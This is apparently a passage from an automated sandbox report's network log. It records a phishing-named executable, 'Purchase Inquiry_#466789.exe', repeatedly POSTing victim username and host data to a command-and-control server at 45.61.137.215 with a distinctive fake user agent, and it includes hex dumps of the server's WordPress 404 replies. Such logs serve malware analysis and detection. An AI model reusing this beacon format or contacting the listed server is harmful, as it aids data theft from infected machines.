                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:36.116667986 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:36.116688013 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:36.116697073 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:36.116714954 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:36.116727114 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:36.116841078 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:36.116894960 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:36.116913080 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:36.117075920 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.44975645.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:36.447382927 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:36.452461958 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:38.642236948 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:36 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:38.642363071 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:38.642414093 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:38.642448902 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:38.642498970 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:38.642538071 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:38.642571926 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:38.642622948 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:38.642656088 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:32:38.642692089 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.44975745.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:38.792072058 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:38.797053099 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:40.933995962 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:39 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:40.934026957 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:40.934077024 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:40.934111118 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:40.934144020 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:40.934178114 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:40.934228897 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:40.934262037 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:40.934292078 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:40.934325933 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.44975845.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:41.223818064 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
